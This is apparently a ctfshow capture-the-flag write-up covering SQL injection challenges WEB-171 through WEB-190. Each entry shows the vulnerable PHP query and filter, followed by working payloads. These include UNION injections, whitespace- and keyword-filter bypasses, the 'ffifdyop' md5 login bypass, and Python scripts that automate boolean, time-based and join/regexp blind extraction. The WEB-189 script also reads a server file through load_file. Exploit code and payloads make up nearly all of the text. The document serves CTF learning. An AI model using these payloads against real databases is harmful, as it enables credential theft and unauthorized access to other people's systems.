WEB-171

//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

payload:

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
1' union select id,username,password from ctfshow_user --+

WEB-172

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

payload:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+
1' union select hex(username),password from ctfshow_user2 --+

WEB-173

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

payload:

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user3' --+
1' union select hex(id),hex(username),hex(password) from ctfshow_user3 --+

WEB-174

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

payload:

import requests

url  = "http://43fcdabd-c874-4eff-aba9-7f5a39e7d3d0.challenge.ctf.show/api/v4.php?id="
flag = ""
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."

for i in range(1,46):
    for j in dirt:
        #payload = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload = 'group_concat(column_name) from information_schema.columns where table_name="ctfshow_user4"'
        payload = 'password from ctfshow_user4 where username="flag"'
        payload = '''1' and substr((select {}),{},1)="{}"--+'''.format(payload,i,j)
        payload = url + payload
        print(payload + flag)
        res = requests.get(payload)
        if 'admin' in res.text:
            flag += j
            print(flag)
            break

WEB-175

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

payload:

import requests
import time

url  = "http://ec5964c7-abfc-4994-b944-4cdc22fe9cfa.challenge.ctf.show/api/v5.php?id="
flag = ""
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."

for i in range(1,46):
    for j in dirt:
        a = time.time()
        #payload = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload = 'group_concat(column_name) from information_schema.columns where table_name="ctfshow_user5"'
        payload = 'password from ctfshow_user5 where username="flag"'
        payload = '''1' and if(substr((select {}),{},1)="{}",sleep(3),0)--+'''.format(payload,i,j)
        payload = url + payload
        print(payload + flag)
        res = requests.get(payload)
        b = time.time()
        if (b - a) >= 2.5:
            flag += j
            print(flag)
            break

WEB-176

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

payload:

1' or 1=1 --+

WEB-177

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

过滤了空格
payload:

1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23

WEB-178

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }   

payload:

1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23

WEB-179

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

过滤了空格,%09
payload:

1'%0cunion%0cselect%0c1,2,group_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()%0c%23
1'%0cunion%0cselect%0c1,2,group_concat(column_name)%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_name='ctfshow_user'%0c%23
1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%0c%23

WEB-180

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

payload:

api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1

WEB-181

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }

payload:

api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1

WEB-182

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

payload:

api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1

WEB-183

//拼接sql语句查找指定ID用户
  $sql = "select count(pass) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }
//返回用户表的记录总数
      $user_count = 0;

payload:

import requests
s = requests.session()

url  = "http://601333f9-6b46-44b1-9696-99b072b8d352.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."

for i in range(8,46):
    for j in dirt:
        data['tableName'] = "(ctfshow_user)where(left(pass,{}))like'{}'".format(i,flag + j)
        res  = requests.post(url,data=data)
        print(j)
        if '$user_count = 1;' in res.text:
            flag += j
            print(flag)
            break

WEB-184

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
//返回用户表的记录总数
      $user_count = 0;

payload:

import requests
s = requests.session()

url  = "http://2f26a0e7-8a44-47b8-bbe7-6d1aa82aa558.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."

for i in range(9,46):
    for j in dirt:
        k = ord(j)
        data['tableName'] = "ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{},1)regexp(char({})))".format(i,k)
        res  = requests.post(url,data=data)
        print(j)
        if '$user_count = 43;' in res.text:
            flag += j
            print(flag)
            break

WEB-185

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
//返回用户表的记录总数
      $user_count = 0;

payload:

import requests
s = requests.session()

url  = "http://cf339e07-f61c-429a-95ed-e6c0eb4f34fd.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."


def true(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n-1):
            num+='+true'
    return num

for i in range(9,46):
    for j in dirt:
        k = ord(j)
        data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{true(i)},{true(1)})regexp(char({true(k)})))"
        res  = requests.post(url,data=data)
        print(j)
        if '$user_count = 43;' in res.text:
            flag += j
            print(flag)
            break     

WEB-186

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
//返回用户表的记录总数
      $user_count = 0;      

payload:

import requests
s = requests.session()

url  = "http://aa84b762-1ddb-4b0a-926c-6c2aa357ee60.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."


def true(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n-1):
            num+='+true'
    return num

for i in range(9,46):
    for j in dirt:
        k = ord(j)
        data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{true(i)},{true(1)})regexp(char({true(k)})))"
        res  = requests.post(url,data=data)
        print(j)
        if '$user_count = 43;' in res.text:
            flag += j
            print(flag)
            break

WEB-187

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";

    $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    }

payload:

用户:admin 密码:ffifdyop

WEB-188

//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username}";
  //用户名检测
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }

payload:

用户:0 密码:0

WEB-189

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";
  //用户名检测
  if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

payload:

import requests

url = 'http://e32b038a-f47c-4fd9-bede-e7ebae1e0506.challenge.ctf.show/api/'
data = {'username':'','password':123}

def getIndex():
    start = 1
    tail  = 300
    mid   = (start + tail) //2
    while start < tail:
        mid = (start + tail) //2
        data['username'] = "if(locate('ctfshow',load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid))
        res = requests.post(url,data=data)

        if "密码错误" in res.json()['msg']:
            start = mid + 1
        else:
            tail = mid 
    return mid

def getFlag(num):
    flag = ''
    for i in range(int(num)+1,int(num)+46):
        for j in r'1234567890{-}qazwsxedcrfvtgbyhnujmiklop':
            data['username'] = 'if(ascii(substr(load_file("/var/www/html/api/index.php"),%d,1))!=%d,0,1)' % (i, ord(j))
            res = requests.post(url,data=data)
            if "密码错误" != res.json()['msg']:
                flag += j
                print(flag)
                break
getFlag(getIndex())

WEB-190

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

  //TODO:感觉少了个啥,奇怪

payload:

import requests

url  = 'http://5a06a32e-8ee9-4c40-bbb7-de12a6c92342.challenge.ctf.show/api/'
data = {'username':'','password':123}
flag = '' 

for i in range(1,46):
    first = 32
    tail  = 127
    while first < tail:
        mid = (first + tail) // 2
        data['username'] = f"admin' and if(ascii(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
        res = requests.post(url,data=data)
        if '密码错误' in res.json()['msg']:
            first = mid + 1
        else:
            tail = mid
    flag = flag + chr(first)
    print(flag)